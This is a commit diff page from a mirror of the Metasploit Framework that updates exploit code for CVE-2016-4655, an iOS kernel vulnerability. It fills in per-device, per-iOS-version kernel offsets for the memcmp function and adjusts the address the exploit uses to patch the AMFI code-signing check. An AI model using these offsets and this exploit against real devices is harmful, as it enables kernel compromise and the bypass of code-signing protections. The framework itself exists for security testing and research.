infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

add find_memcmp() offsets

GSoC/Meterpreter_Web_Console
Tim W 2018-10-22 19:48:32 +08:00
parent abdbc89171
commit 71bf4ead73
2 changed files with 129 additions and 133 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
external/source/exploits/CVE-2016-4655/exploit32.c vendored
View File

@ -1263,7 +1263,7 @@ void init_exploit(void * dlsym_addr, void * dlopen_addr)
amfi_macho = (void*)((uint32_t)amfi_macho - 0x1000); amfi_macho = (void*)((uint32_t)amfi_macho - 0x1000);
} }
uint32_t memcmp_what = kernel_start + find_memcmp(); uint32_t memcmp_what = kernel_start + find_memcmp() + 1;
debug_print("memcmp_what %p\n", (void*)(memcmp_what)); debug_print("memcmp_what %p\n", (void*)(memcmp_what));
uint32_t amfi_memcmp_off; uint32_t amfi_memcmp_off;
for (amfi_memcmp_off = amfi_macho_start; amfi_memcmp_off < kernel_size; amfi_memcmp_off += 4) { for (amfi_memcmp_off = amfi_macho_start; amfi_memcmp_off < kernel_size; amfi_memcmp_off += 4) {

260
external/source/exploits/CVE-2016-4655/offsets32.c vendored
View File

@ -2810,138 +2810,134 @@ static inline unsigned int find_mac_proc_check(void) {
/*3588 0x000c3c80 0x800c4c80 GLOBAL FUNC 0 _memcmp*/ /*3588 0x000c3c80 0x800c4c80 GLOBAL FUNC 0 _memcmp*/
static inline unsigned int find_memcmp(void) { static inline unsigned int find_memcmp(void) {
switch (target_environment) { switch (target_environment) {
case iPhone41_iOS902: return 0xc3c80; case iPhone41_iOS934: return 0x000c085c;
case iPhone41_iOS910: return 0xc3c80; case iPhone41_iOS933: return 0x000c085c;
case iPhone41_iOS920: return 0xc3c80; case iPhone41_iOS932: return 0x000c08ec;
case iPhone41_iOS921: return 0xc3c80; case iPhone41_iOS930: return 0x000c08dc;
case iPhone41_iOS930: return 0xc3c80; case iPhone41_iOS921: return 0x000bfd7c;
case iPhone41_iOS931: return 0xc3c80; case iPhone41_iOS920: return 0x000bfd2c;
case iPhone41_iOS932: return 0xc3c80; case iPhone41_iOS910: return 0x000c1340;
case iPhone41_iOS933: return 0xc3c80; case iPhone41_iOS902: return 0x000c11d0;
case iPhone41_iOS934: return 0xc3c80; case iPhone51_iOS934: return 0x000c3e10;
case iPhone51_iOS910: return 0xc3c80; case iPhone51_iOS933: return 0x000c3e10;
case iPhone51_iOS920: return 0xc3c80; case iPhone51_iOS932: return 0x000c3c80;
case iPhone51_iOS921: return 0xc3c80; case iPhone51_iOS930: return 0x000c3c90;
case iPhone51_iOS930: return 0xc3c80; case iPhone51_iOS921: return 0x000c2ff0;
case iPhone51_iOS931: return 0xc3c80; case iPhone51_iOS920: return 0x000c2fb0;
case iPhone51_iOS932: return 0xc3c80; case iPhone51_iOS910: return 0x000c42c4;
case iPhone51_iOS933: return 0xc3c80; /*case iPhone51_iOS902: return 0x000c4124;*/
case iPhone51_iOS934: return 0xc3c80; case iPhone52_iOS934: return 0x000c3e10;
case iPhone52_iOS902: return 0xc3c80; case iPhone52_iOS933: return 0x000c3e10;
case iPhone52_iOS910: return 0xc3c80; case iPhone52_iOS932: return 0x000c3c80;
case iPhone52_iOS920: return 0xc3c80; case iPhone52_iOS930: return 0x000c3c90;
case iPhone52_iOS921: return 0xc3c80; case iPhone52_iOS921: return 0x000c2ff0;
case iPhone52_iOS930: return 0xc3c80; case iPhone52_iOS920: return 0x000c2fb0;
case iPhone52_iOS931: return 0xc3c80; case iPhone52_iOS910: return 0x000c42c4;
case iPhone52_iOS932: return 0xc3c80; case iPhone52_iOS902: return 0x000c4124;
case iPhone52_iOS933: return 0xc3c80; case iPhone53_iOS934: return 0x000c3e10;
case iPhone52_iOS934: return 0xc3c80; case iPhone53_iOS933: return 0x000c3e10;
case iPhone53_iOS910: return 0xc3c80; case iPhone53_iOS932: return 0x000c3c80;
case iPhone53_iOS920: return 0xc3c80; case iPhone53_iOS930: return 0x000c3c90;
case iPhone53_iOS921: return 0xc3c80; case iPhone53_iOS921: return 0x000c2ff0;
case iPhone53_iOS930: return 0xc3c80; case iPhone53_iOS920: return 0x000c2fb0;
case iPhone53_iOS931: return 0xc3c80; case iPhone53_iOS910: return 0x000c42c4;
case iPhone53_iOS932: return 0xc3c80; /*case iPhone53_iOS902: return 0x000c4124;*/
case iPhone53_iOS933: return 0xc3c80; case iPhone54_iOS934: return 0x000c3e10;
case iPhone53_iOS934: return 0xc3c80; case iPhone54_iOS933: return 0x000c3e10;
case iPhone54_iOS910: return 0xc3c80; case iPhone54_iOS932: return 0x000c3c80;
case iPhone54_iOS920: return 0xc3c80; case iPhone54_iOS930: return 0x000c3c90;
case iPhone54_iOS921: return 0xc3c80; case iPhone54_iOS921: return 0x000c2ff0;
case iPhone54_iOS930: return 0xc3c80; case iPhone54_iOS920: return 0x000c2fb0;
case iPhone54_iOS931: return 0xc3c80; case iPhone54_iOS910: return 0x000c42c4;
case iPhone54_iOS932: return 0xc3c80; /*case iPhone54_iOS902: return 0x000c4124;*/
case iPhone54_iOS933: return 0xc3c80; case iPad21_iOS934: return 0x000c085c;
case iPhone54_iOS934: return 0xc3c80; case iPad21_iOS933: return 0x000c085c;
case iPad21_iOS910: return 0xc3c80; case iPad21_iOS932: return 0x000c08ec;
case iPad21_iOS920: return 0xc3c80; case iPad21_iOS930: return 0x000c08dc;
case iPad21_iOS921: return 0xc3c80; case iPad21_iOS921: return 0x000bfd7c;
case iPad21_iOS930: return 0xc3c80; case iPad21_iOS920: return 0x000bfd2c;
case iPad21_iOS931: return 0xc3c80; case iPad21_iOS910: return 0x000c1340;
case iPad21_iOS932: return 0xc3c80; /*case iPad21_iOS902: return 0x000c11d0;*/
case iPad21_iOS933: return 0xc3c80; case iPad22_iOS934: return 0x000c085c;
case iPad21_iOS934: return 0xc3c80; case iPad22_iOS933: return 0x000c085c;
case iPad22_iOS910: return 0xc3c80; case iPad22_iOS932: return 0x000c08ec;
case iPad22_iOS920: return 0xc3c80; case iPad22_iOS930: return 0x000c08dc;
case iPad22_iOS921: return 0xc3c80; case iPad22_iOS921: return 0x000bfd7c;
case iPad22_iOS930: return 0xc3c80; case iPad22_iOS920: return 0x000bfd2c;
case iPad22_iOS931: return 0xc3c80; case iPad22_iOS910: return 0x000c1340;
case iPad22_iOS932: return 0xc3c80; /*case iPad22_iOS902: return 0x000c11d0;*/
case iPad22_iOS933: return 0xc3c80; case iPad23_iOS934: return 0x000c085c;
case iPad22_iOS934: return 0xc3c80; case iPad23_iOS933: return 0x000c085c;
case iPad23_iOS910: return 0xc3c80; case iPad23_iOS932: return 0x000c08ec;
case iPad23_iOS920: return 0xc3c80; case iPad23_iOS930: return 0x000c08dc;
case iPad23_iOS921: return 0xc3c80; case iPad23_iOS921: return 0x000bfd7c;
case iPad23_iOS930: return 0xc3c80; case iPad23_iOS920: return 0x000bfd2c;
case iPad23_iOS931: return 0xc3c80; case iPad23_iOS910: return 0x000c1340;
case iPad23_iOS932: return 0xc3c80; /*case iPad23_iOS902: return 0x000c11d0;*/
case iPad23_iOS933: return 0xc3c80; case iPad24_iOS934: return 0x000c085c;
case iPad23_iOS934: return 0xc3c80; case iPad24_iOS933: return 0x000c085c;
case iPad24_iOS910: return 0xc3c80; case iPad24_iOS932: return 0x000c08ec;
case iPad24_iOS920: return 0xc3c80; case iPad24_iOS930: return 0x000c08dc;
case iPad24_iOS921: return 0xc3c80; case iPad24_iOS921: return 0x000bfd7c;
case iPad24_iOS930: return 0xc3c80; case iPad24_iOS920: return 0x000bfd2c;
case iPad24_iOS931: return 0xc3c80; case iPad24_iOS910: return 0x000c1340;
case iPad24_iOS932: return 0xc3c80; /*case iPad24_iOS902: return 0x000c11d0;*/
case iPad24_iOS933: return 0xc3c80; case iPad31_iOS934: return 0x000c085c;
case iPad24_iOS934: return 0xc3c80; case iPad31_iOS933: return 0x000c085c;
case iPad25_iOS902: return 0xc3c80; case iPad31_iOS932: return 0x000c08ec;
case iPad31_iOS910: return 0xc3c80; case iPad31_iOS930: return 0x000c08dc;
case iPad31_iOS920: return 0xc3c80; case iPad31_iOS921: return 0x000bfd7c;
case iPad31_iOS921: return 0xc3c80; case iPad31_iOS920: return 0x000bfd2c;
case iPad31_iOS930: return 0xc3c80; case iPad31_iOS910: return 0x000c1340;
case iPad31_iOS931: return 0xc3c80; /*case iPad31_iOS902: return 0x000c11d0;*/
case iPad31_iOS932: return 0xc3c80; case iPad32_iOS934: return 0x000c085c;
case iPad31_iOS933: return 0xc3c80; case iPad32_iOS933: return 0x000c085c;
case iPad31_iOS934: return 0xc3c80; case iPad32_iOS932: return 0x000c08ec;
case iPad32_iOS910: return 0xc3c80; case iPad32_iOS930: return 0x000c08dc;
case iPad32_iOS920: return 0xc3c80; case iPad32_iOS921: return 0x000bfd7c;
case iPad32_iOS921: return 0xc3c80; case iPad32_iOS920: return 0x000bfd2c;
case iPad32_iOS930: return 0xc3c80; case iPad32_iOS910: return 0x000c1340;
case iPad32_iOS931: return 0xc3c80; /*case iPad32_iOS902: return 0x000c11d0;*/
case iPad32_iOS932: return 0xc3c80; case iPad33_iOS934: return 0x000c085c;
case iPad32_iOS933: return 0xc3c80; case iPad33_iOS933: return 0x000c085c;
case iPad32_iOS934: return 0xc3c80; case iPad33_iOS932: return 0x000c08ec;
case iPad33_iOS902: return 0xc3c80; case iPad33_iOS930: return 0x000c08dc;
case iPad33_iOS910: return 0xc3c80; case iPad33_iOS921: return 0x000bfd7c;
case iPad33_iOS920: return 0xc3c80; case iPad33_iOS920: return 0x000bfd2c;
case iPad33_iOS921: return 0xc3c80; case iPad33_iOS910: return 0x000c1340;
case iPad33_iOS930: return 0xc3c80; /*case iPad33_iOS902: return 0x000c11d0;*/
case iPad33_iOS931: return 0xc3c80; case iPad34_iOS934: return 0x000c3e10;
case iPad33_iOS932: return 0xc3c80; case iPad34_iOS933: return 0x000c3e10;
case iPad33_iOS933: return 0xc3c80; case iPad34_iOS932: return 0x000c3c80;
case iPad33_iOS934: return 0xc3c80; case iPad34_iOS930: return 0x000c3c90;
case iPad34_iOS910: return 0xc3c80; case iPad34_iOS921: return 0x000c2ff0;
case iPad34_iOS920: return 0xc3c80; case iPad34_iOS920: return 0x000c2fb0;
case iPad34_iOS921: return 0xc3c80; case iPad34_iOS910: return 0x000c42c4;
case iPad34_iOS930: return 0xc3c80; /*case iPad34_iOS902: return 0x000c4124;*/
case iPad34_iOS931: return 0xc3c80; case iPad35_iOS934: return 0x000c3e10;
case iPad34_iOS932: return 0xc3c80; case iPad35_iOS933: return 0x000c3e10;
case iPad34_iOS933: return 0xc3c80; case iPad35_iOS932: return 0x000c3c80;
case iPad34_iOS934: return 0xc3c80; case iPad35_iOS930: return 0x000c3c90;
case iPad35_iOS910: return 0xc3c80; case iPad35_iOS921: return 0x000c2ff0;
case iPad35_iOS920: return 0xc3c80; case iPad35_iOS920: return 0x000c2fb0;
case iPad35_iOS921: return 0xc3c80; case iPad35_iOS910: return 0x000c42c4;
case iPad35_iOS930: return 0xc3c80; /*case iPad35_iOS902: return 0x000c4124;*/
case iPad35_iOS931: return 0xc3c80; case iPad36_iOS934: return 0x000c3e10;
case iPad35_iOS932: return 0xc3c80; case iPad36_iOS933: return 0x000c3e10;
case iPad35_iOS933: return 0xc3c80; case iPad36_iOS932: return 0x000c3c80;
case iPad35_iOS934: return 0xc3c80; case iPad36_iOS930: return 0x000c3c90;
case iPad36_iOS910: return 0xc3c80; case iPad36_iOS921: return 0x000c2ff0;
case iPad36_iOS920: return 0xc3c80; case iPad36_iOS920: return 0x000c2fb0;
case iPad36_iOS921: return 0xc3c80; case iPad36_iOS910: return 0x000c42c4;
case iPad36_iOS930: return 0xc3c80; /*case iPad36_iOS902: return 0x000c4124;*/
case iPad36_iOS931: return 0xc3c80; case iPod51_iOS934: return 0x000c085c;
case iPad36_iOS932: return 0xc3c80; case iPod51_iOS933: return 0x000c085c;
case iPad36_iOS933: return 0xc3c80; case iPod51_iOS932: return 0x000c08ec;
case iPad36_iOS934: return 0xc3c80; case iPod51_iOS930: return 0x000c08dc;
case iPod51_iOS910: return 0xc3c80; case iPod51_iOS921: return 0x000bfd7c;
case iPod51_iOS920: return 0xc3c80; case iPod51_iOS920: return 0x000bfd2c;
case iPod51_iOS921: return 0xc3c80; case iPod51_iOS910: return 0x000c1340;
case iPod51_iOS930: return 0xc3c80; /*case iPod51_iOS902: return 0x000c11d0;*/
case iPod51_iOS931: return 0xc3c80;
case iPod51_iOS932: return 0xc3c80;
case iPod51_iOS933: return 0xc3c80;
case iPod51_iOS934: return 0xc3c80;
default: return 0; default: return 0;
} }
} }